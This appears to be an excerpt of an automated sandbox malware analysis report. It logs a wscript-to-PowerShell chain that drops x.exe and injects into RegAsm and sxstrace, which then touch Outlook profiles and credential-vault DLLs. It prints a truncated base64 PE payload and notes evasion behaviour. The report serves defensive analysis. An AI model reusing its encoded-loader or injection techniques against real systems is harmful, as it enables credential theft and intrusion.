                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Binary string: sxstrace.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sxstrace.pdbGCTL source: W4ja93oMuuBdSP.exe, 00000007.00000002.2893988847.000000000122E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1857293927.0000000002680000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, sxstrace.exe, 00000008.00000002.2895044390.000000000470E000.00000040.00001000.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1857380383.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000003.1855386920.0000000004212000.00000004.00000020.00020000.00000000.sdmp, sxstrace.exe, 00000008.00000002.2895044390.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: W4ja93oMuuBdSP.exe, 00000007.00000000.1778257043.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp, W4ja93oMuuBdSP.exe, 0000000C.00000000.1925948690.0000000000B0F000.00000002.00000001.01000000.00000009.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAM
                Source: x.exe.1.drStatic PE information: 0xE03BFBC7 [Fri Mar 18 23:37:43 2089 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00417041 pushfd ; ret 6_2_00417043
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00407028 push edi; ret 6_2_0040702E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00414835 push ebp; ret 6_2_0041485A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00403140 push eax; ret 6_2_00403142
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040A91A pushfd ; ret 6_2_0040A920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004139A5 push edi; iretd 6_2_004139A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041F2E3 push edi; iretd 6_2_0041F2EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00404AFA push cs; ret 6_2_00404B01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041729F push es; iretd 6_2_004172A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00417BD3 push ebp; ret 6_2_00417BE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004183D2 push eax; ret 6_2_004183D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040AC6F push FFFFFFE4h; retf 6_2_0040AC72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041A473 push edi; iretd 6_2_0041A47E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040BD26 push eax; iretd 6_2_0040BD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00404E11 push eax; iretd 6_2_00404E13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00411EBA push edi; ret 6_2_00411EC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004147C4 push cs; retf 6_2_004147DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040A7D3 push ds; ret 6_2_0040A7DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00417FF9 push ebp; ret 6_2_00418032
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026B09AD push ecx; mov dword ptr [esp], ecx6_2_026B09B6
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05500580 pushfd ; ret 7_2_05500586
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550DC5F push ebp; ret 7_2_0550DC98
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550A42A push cs; retf 7_2_0550A444
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_054FCC8E push edi; ret 7_2_054FCC94
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550A49B push ebp; ret 7_2_0550A4C0
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550CCA7 pushfd ; ret 7_2_0550CCA9
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_05514F49 push edi; iretd 7_2_05514F54
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_054FA760 push cs; ret 7_2_054FA767
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550CF05 push es; iretd 7_2_0550CF06
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550960B push edi; iretd 7_2_0550960C
                Source: C:\Program Files (x86)\oPIoywAvxjAdhHrPAMJPgOJeGjkAHdNwmOzjjyzYQeHXNWflKjessvWGuizcfS\W4ja93oMuuBdSP.exeCode function: 7_2_0550198C push eax; iretd 7_2_0550198E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sxstrace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\sxstrace.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4390000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_026F096E rdtsc 6_2_026F096E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
